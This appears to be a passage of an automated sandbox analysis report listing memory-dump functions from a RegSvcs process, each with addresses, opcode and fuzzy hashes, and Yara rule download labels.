                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $
                                                                                                          • API String ID: 0-3993045852
                                                                                                          • Opcode ID: e13b70129b5b0bdde75cc87b4a9a679d506797eb2d3cd0b9674903c1d22c1b41
                                                                                                          • Instruction ID: 255be686d41a2bdf1efcd813842a7cc0ae276a68a7e59b7ca3d0db28f4103646
                                                                                                          • Opcode Fuzzy Hash: e13b70129b5b0bdde75cc87b4a9a679d506797eb2d3cd0b9674903c1d22c1b41
                                                                                                          • Instruction Fuzzy Hash: 62C1AA35F0021A8FDB14DBA4D894AAEB7F6EF88324F208469D406AB354DA31DD46CB91
                                                                                                          Function 016DED20 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1446 16ded20-16ded94 GlobalMemoryStatusEx 1448 16ded9d-16dedc5 1446->1448 1449 16ded96-16ded9c 1446->1449 1449->1448
                                                                                                          APIs
                                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 016DED87
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4156045969.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_16d0000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: GlobalMemoryStatus
                                                                                                          • String ID:
                                                                                                          • API String ID: 1890195054-0
                                                                                                          • Opcode ID: 3d50ffdd244dd0811e1dbc614883ff0844c049d7c68dbd305bbdc15c993875af
                                                                                                          • Instruction ID: 9bd1985d02c9c84fd3fe56d99bfa26299d3cf0c43e5781372769b199a11a15f8
                                                                                                          • Opcode Fuzzy Hash: 3d50ffdd244dd0811e1dbc614883ff0844c049d7c68dbd305bbdc15c993875af
                                                                                                          • Instruction Fuzzy Hash: 7E1123B2C002599BDB10DF9AC844BDEFBF4FF48320F10812AD818A7240D778A940CFA5
                                                                                                          Function 06D2592D Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $
                                                                                                          • API String ID: 0-3993045852
                                                                                                          • Opcode ID: 9aa6ab7b5074bc01f387f9e3472a59a39174877f69d9a883eb60c9cd3b8e29e9
                                                                                                          • Instruction ID: 006fec00bf2df2290993ff11270b549c577061043ddde10a3bb2fdae58f62a00
                                                                                                          • Opcode Fuzzy Hash: 9aa6ab7b5074bc01f387f9e3472a59a39174877f69d9a883eb60c9cd3b8e29e9
                                                                                                          • Instruction Fuzzy Hash: 15817971E002199FDB14DFA4C958AEEBBF2FF88714F208168D405BB354DA71AD46CBA1
                                                                                                          Function 06D2DB33 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PH^q
                                                                                                          • API String ID: 0-2549759414
                                                                                                          • Opcode ID: 81961dadedd95e66db3ccff5b51420e1f78ea62340872d67689881349697f02b
                                                                                                          • Instruction ID: 65b5da7456d68513140b13d8b6c6600caf416e4296229d380ff1e56ab0d8a60b
                                                                                                          • Opcode Fuzzy Hash: 81961dadedd95e66db3ccff5b51420e1f78ea62340872d67689881349697f02b
                                                                                                          • Instruction Fuzzy Hash: B841C130E0021A9FDB65DF65D85469EBBB7FF95304F204529E401EB240EBB0D946CB91
                                                                                                          Function 06D22267 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PH^q
                                                                                                          • API String ID: 0-2549759414
                                                                                                          • Opcode ID: 856756cfb9fadfd34413a82be1a7ad5d80e0b008e0e5e70d41dd7fcb3d4792e1
                                                                                                          • Instruction ID: efb68904a8a9fc93df9ff5bd6d9362cf105ffaab425bdc69304bb65573303457
                                                                                                          • Opcode Fuzzy Hash: 856756cfb9fadfd34413a82be1a7ad5d80e0b008e0e5e70d41dd7fcb3d4792e1
                                                                                                          • Instruction Fuzzy Hash: DA31EF30B002129FDB659B74C8146AE7BA7BF99308F10452CE406DB394EE35CE42CBA1
                                                                                                          Function 06D22278 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PH^q
                                                                                                          • API String ID: 0-2549759414
                                                                                                          • Opcode ID: 9b8efbabeb27c22123dd90658d6def1ca4bfca991f0eb38077e01b46067f60cc
                                                                                                          • Instruction ID: 8019584ec13d730b15eb159e7131c2c58c8ef1829b29d244dac7eeaf1909b4b7
                                                                                                          • Opcode Fuzzy Hash: 9b8efbabeb27c22123dd90658d6def1ca4bfca991f0eb38077e01b46067f60cc
                                                                                                          • Instruction Fuzzy Hash: 6A31BC30B002129FDB599F74D95466E7BA7BF89304F20892CE406DB394EE35DE46CBA1
                                                                                                          Function 06D280F3 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q
                                                                                                          • API String ID: 0-388095546
                                                                                                          • Opcode ID: afd81083ee5222d892bead73799173607fdee670c81874f54fe82aa319fa6d68
                                                                                                          • Instruction ID: 0d773f82b5bca3c67e21c8f35dd80e5c3ac64ac2177a9b7106c57c5193c7f263
                                                                                                          • Opcode Fuzzy Hash: afd81083ee5222d892bead73799173607fdee670c81874f54fe82aa319fa6d68
                                                                                                          • Instruction Fuzzy Hash: 30114931F002269FDF654EA5EC806AAB7A9EB94355F040439D915D7384CB35ED8ED3E0
                                                                                                          Function 06D280EB Relevance: 1.3, Strings: 1, Instructions: 33COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q
                                                                                                          • API String ID: 0-388095546
                                                                                                          • Opcode ID: 3985ce9466a2582e192cadfb6806b99fdc7c9bdbb31fc3432743b004f97923bd
                                                                                                          • Instruction ID: 88edb21f65fa22296ad5796a0c67e53957b6d87d00b6cfe4f35e34507c89ae58
                                                                                                          • Opcode Fuzzy Hash: 3985ce9466a2582e192cadfb6806b99fdc7c9bdbb31fc3432743b004f97923bd
                                                                                                          • Instruction Fuzzy Hash: 10F0E236E14237DFEFA64F81FC8016577A8EB6425AF2400A3C9248B1C5C738DD8DE6A1
                                                                                                          Function 06D2B311 Relevance: .6, Instructions: 557COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: df28eeb6de9f06e7f051a3daa5bdc912312b266767c239cd5b6e089ae584b057
                                                                                                          • Instruction ID: 3ef40281c6725dea62b29ff5871edea077c532ad6e06a9f76634a08819ea8130
                                                                                                          • Opcode Fuzzy Hash: df28eeb6de9f06e7f051a3daa5bdc912312b266767c239cd5b6e089ae584b057
                                                                                                          • Instruction Fuzzy Hash: FE126F30E0021A8FDF64CB68D484BADB7B6FB5931CF248827E459EB351DAB5DC818B51
                                                                                                          Function 06D26DA0 Relevance: .3, Instructions: 257COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 65e9562121ce6b184e3bef00517f7133a43d420822958a72cf091dc41e2f7975
                                                                                                          • Instruction ID: 4f5e56ff278f86427e5948b4038c3d5606b8652ccef776c5da28a3be6b4b6092
                                                                                                          • Opcode Fuzzy Hash: 65e9562121ce6b184e3bef00517f7133a43d420822958a72cf091dc41e2f7975
                                                                                                          • Instruction Fuzzy Hash: F5A17C30A00225CFCB64DB69D648A6DB7F2FF84358F14C569E41AAB351DB36EC85CB90
                                                                                                          Function 06D26268 Relevance: .2, Instructions: 229COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a1ee8ad75d900bcaf04bd6d80247614d178c472e9c219f85801546a105b9f736
                                                                                                          • Instruction ID: d36ff9fa84463682e2e68070e63818e49a9b6258297663a12bf619c457d6fe17
                                                                                                          • Opcode Fuzzy Hash: a1ee8ad75d900bcaf04bd6d80247614d178c472e9c219f85801546a105b9f736
                                                                                                          • Instruction Fuzzy Hash: 8C61E0B1F001224FCF149B7EC88466FAAD7AFD4624B25403AD80EDB360DE65DD0287D2
                                                                                                          Function 06D24319 Relevance: .2, Instructions: 221COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bc64d90c94137b643c77bcdc6e9770d94f153fc9f7681a4401796e301f90ae68
                                                                                                          • Instruction ID: e625d4bf226d075daf4b715e377a46f088758eeb2a3c2b0a89dff29e561ff565
                                                                                                          • Opcode Fuzzy Hash: bc64d90c94137b643c77bcdc6e9770d94f153fc9f7681a4401796e301f90ae68
                                                                                                          • Instruction Fuzzy Hash: F6813B30B0021A9FDB44DFA8D5946AEB7F6EF89304F108529D80ADB394EB74DC468B91
                                                                                                          Function 06D24311 Relevance: .2, Instructions: 218COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9edb4ec2b041a1f23a9769cf929682ce00d7b3bd8dbf64f04b4c04dedbf97f66
                                                                                                          • Instruction ID: 5890e1885672601f6cb40448e883a28594ada0b406331f651e6a146a6f4d862c
                                                                                                          • Opcode Fuzzy Hash: 9edb4ec2b041a1f23a9769cf929682ce00d7b3bd8dbf64f04b4c04dedbf97f66
                                                                                                          • Instruction Fuzzy Hash: AB812B30B002169FDB44DFA8D5946AEB7F2EF89314F108429D80ADB394EB75EC468B51
                                                                                                          Function 06D2AF98 Relevance: .2, Instructions: 215COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1166589cf4df6ac7e3cc79b524c9244aa694bb69caa1de7714d0d8f660f533ef
                                                                                                          • Instruction ID: bd6b642daf3e8b890938328080fc6d16b21c6b5e165ca99a48f6c138c4efd325
                                                                                                          • Opcode Fuzzy Hash: 1166589cf4df6ac7e3cc79b524c9244aa694bb69caa1de7714d0d8f660f533ef
                                                                                                          • Instruction Fuzzy Hash: E7717F31E0031B8FCB65DFA9D4446AEB7B2FF85308F108529D409AB344EB74D846CB91
                                                                                                          Function 06D24640 Relevance: .2, Instructions: 213COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ec103fd108d3968690210451f5005cb4288f3ed429c77fd2f589c09fd23ba090
                                                                                                          • Instruction ID: 4acc84be7e87c69b8292e8a9d0c11e72a0810ec84a91e450f4164568df400cd2
                                                                                                          • Opcode Fuzzy Hash: ec103fd108d3968690210451f5005cb4288f3ed429c77fd2f589c09fd23ba090
                                                                                                          • Instruction Fuzzy Hash: 7E915E30E1021A8BDF60DF68C890B9DB7B1FF99304F208599D549BB354EB70AA85CF91
                                                                                                          Function 06D24648 Relevance: .2, Instructions: 210COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b5fd6a4ff94cda1b67e1e5f56fc4689ef24016e89c1885caecc8da0e4d885041
                                                                                                          • Instruction ID: 02d51466310a60718488f0bbdbe7630baf627049b369d6f0a5026a1e2a1a8f7b
                                                                                                          • Opcode Fuzzy Hash: b5fd6a4ff94cda1b67e1e5f56fc4689ef24016e89c1885caecc8da0e4d885041
                                                                                                          • Instruction Fuzzy Hash: 93914E30E1021A8BDF60DF68C890B9DB7B1FF99304F208599D559BB354EB70AA85CF91
                                                                                                          Function 06D2EF93 Relevance: .2, Instructions: 201COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7cfc83cfb72fdb2b176924182c0f559a9a3dd41d709c0fdfa3fb5761bcf86461
                                                                                                          • Instruction ID: 22323c40d8f31e013e8b4730cb5df071092dae82e9140691f553df2460f65438
                                                                                                          • Opcode Fuzzy Hash: 7cfc83cfb72fdb2b176924182c0f559a9a3dd41d709c0fdfa3fb5761bcf86461
                                                                                                          • Instruction Fuzzy Hash: 6D711970A0021A9FDB55DBA9D980AAEBBF6FF94304F248529D405EB354DB30EC86CB50
                                                                                                          Function 06D2EF98 Relevance: .2, Instructions: 201COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4bdbe4ca0d97820e1368158df320d9a04bc0e450aa9fbd4cf55c312083876364
                                                                                                          • Instruction ID: 00ae86b63a64f16247c07b00d02405ccfb4e5d0a26dc26039eb5cc565e7ba48c
                                                                                                          • Opcode Fuzzy Hash: 4bdbe4ca0d97820e1368158df320d9a04bc0e450aa9fbd4cf55c312083876364
                                                                                                          • Instruction Fuzzy Hash: 2B711970A0021A9FDB55DFA9D980A9EBBF6FF98304F248529D405DB354DB30EC86CB51
                                                                                                          Function 06D2FCF7 Relevance: .2, Instructions: 178COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 988c7e8c714a29f7548c1d64777a2430c8258819ecbbbd4ca22cc9674c518f8a
                                                                                                          • Instruction ID: 2bcc5c26b53e7fa296bf519b645e1975604be5c5244a3413c7b74a788e7051ee
                                                                                                          • Opcode Fuzzy Hash: 988c7e8c714a29f7548c1d64777a2430c8258819ecbbbd4ca22cc9674c518f8a
                                                                                                          • Instruction Fuzzy Hash: 5D51E231E00126DFDF64EBB8E8486AEBBB2FF85318F108C69E106D7251DB358855CB91
                                                                                                          Function 06D2FAAB Relevance: .2, Instructions: 168COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 72f53e859fac28b06ea565be5a5a7731531083ead6b88e24bbfc9b4a0c805f13
                                                                                                          • Instruction ID: b9957c9e3d20c34f7944ccd217a218de4b8903c94a0419e28c04a5c5751d8044
                                                                                                          • Opcode Fuzzy Hash: 72f53e859fac28b06ea565be5a5a7731531083ead6b88e24bbfc9b4a0c805f13
                                                                                                          • Instruction Fuzzy Hash: 8051E570F502269FEFA45B7CDD98B2F266ED799704F204C2AE40AD7394C929CC8157E2
                                                                                                          Function 06D25618 Relevance: .2, Instructions: 168COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0eb2a21d529f55f6a3a16d213e3776e541192c71ccf61795c7dac8a9b2591c33
                                                                                                          • Instruction ID: 214521fd3ce664f69b6ccd26b083eae00badae8fa96dd8683802eb44896870b8
                                                                                                          • Opcode Fuzzy Hash: 0eb2a21d529f55f6a3a16d213e3776e541192c71ccf61795c7dac8a9b2591c33
                                                                                                          • Instruction Fuzzy Hash: 07517035E0021ACFDF60CB68E4C0F7EBBB2EB55318F24886AE559DB291D635D841CB91
                                                                                                          Function 06D2FAB0 Relevance: .2, Instructions: 163COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 730e7d7aa07c1ea45d2d44086f60c1fd41075686f7f909bf0060cd11abb4e9d8
                                                                                                          • Instruction ID: fb51ad69040898105dafb6798087870308ccab36dba7ba2405987a16efe9f87e
                                                                                                          • Opcode Fuzzy Hash: 730e7d7aa07c1ea45d2d44086f60c1fd41075686f7f909bf0060cd11abb4e9d8
                                                                                                          • Instruction Fuzzy Hash: 7651E570F502259FEF645B6CDD98B2F266ED799714F204C2AE40AD3394C939CC8593E2
                                                                                                          Function 06D2C848 Relevance: .2, Instructions: 160COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 63f07d3c69ad79745fe859e62ba7e4e656e156dd9059edb3150c881d80c6e5f7
                                                                                                          • Instruction ID: 69aa6d8ad6c82fd35b1fa95986f54771c1304990c5d3a375ba8569caf6355e0d
                                                                                                          • Opcode Fuzzy Hash: 63f07d3c69ad79745fe859e62ba7e4e656e156dd9059edb3150c881d80c6e5f7
                                                                                                          • Instruction Fuzzy Hash: FC515B30F112168FCB94EF78E98499EBBB2FB88315F108568E405AB355DB35EC45CB90
                                                                                                          Function 06D25488 Relevance: .1, Instructions: 134COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3204ad7773151bf08bf2a8b02c8f4c47fa2f9f79e93328c202599cc377c329ce
                                                                                                          • Instruction ID: 6bbdad6fe82fa7a74b852773f5f8daaa8a917903e4ff88bcd6b8c9738cbfc8ed
                                                                                                          • Opcode Fuzzy Hash: 3204ad7773151bf08bf2a8b02c8f4c47fa2f9f79e93328c202599cc377c329ce
                                                                                                          • Instruction Fuzzy Hash: A2417F71E0061A8FDF70CFA9E880ABFF7B2EBA5314F10492AD156D7650D330E9558B91
                                                                                                          Function 06D2D9EB Relevance: .1, Instructions: 96COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c2c630073156a4f8821865fe2d0d376d4e517a56a467f69ef50180a4b09ebb80
                                                                                                          • Instruction ID: f1211d73579c711969a5303913f347b7ad9b57e90eb6d9bc0eb575c2bceab230
                                                                                                          • Opcode Fuzzy Hash: c2c630073156a4f8821865fe2d0d376d4e517a56a467f69ef50180a4b09ebb80
                                                                                                          • Instruction Fuzzy Hash: B231A530E1031A9FCF25DF68D894A9EBBB6FF94304F104529E405AB340EB70E946CB91
                                                                                                          Function 06D2212B Relevance: .1, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f5a70dfb057257c659d1a975c0055978da74bb3b4312070a20a10d7155901cca
                                                                                                          • Instruction ID: 3027204b53a6bace0e54ce563cd6945ea207c4afa101930cd3e886fefefdf3be
                                                                                                          • Opcode Fuzzy Hash: f5a70dfb057257c659d1a975c0055978da74bb3b4312070a20a10d7155901cca
                                                                                                          • Instruction Fuzzy Hash: AF319270E102169FCB59CFA4D858A9EB7B2FF89304F108519E906E7340DB71DD46CB90
                                                                                                          Function 06D2D9F0 Relevance: .1, Instructions: 93COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 82f6b58c4eb2bc1ddca7ec4ff3f3b736970cedea23caf6a8375cac4d434eee27
                                                                                                          • Instruction ID: d130d2d70aabdd2234f6d2b1a40a7f0672012e82dfe13931fb1e645d3b651232
                                                                                                          • Opcode Fuzzy Hash: 82f6b58c4eb2bc1ddca7ec4ff3f3b736970cedea23caf6a8375cac4d434eee27
                                                                                                          • Instruction Fuzzy Hash: 97318130E1031A9FCF15DFA8D984A9EBBB6FF94304F104929E405AB340EB70E9468B90
                                                                                                          Function 06D22138 Relevance: .1, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b08e4778659525e6d8f0dab35eb7fa0f885a39316b7cf084ec3fe0202f3f9b20
                                                                                                          • Instruction ID: a78e82b64901013ec96243c2e6f75f493b07e0360220dba18d8bd31caa06453a
                                                                                                          • Opcode Fuzzy Hash: b08e4778659525e6d8f0dab35eb7fa0f885a39316b7cf084ec3fe0202f3f9b20
                                                                                                          • Instruction Fuzzy Hash: 82318070E102169BCB59CFA4D858A9EB7B2FF89304F10C529E80AE7340DB71AD46CB50
                                                                                                          Function 06D23B15 Relevance: .1, Instructions: 82COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4169455122.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_6d20000_RegSvcs.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8b65249ace9156929d1db9b5cda11aab8b23970ec3c50393f35b9220dd1722eb
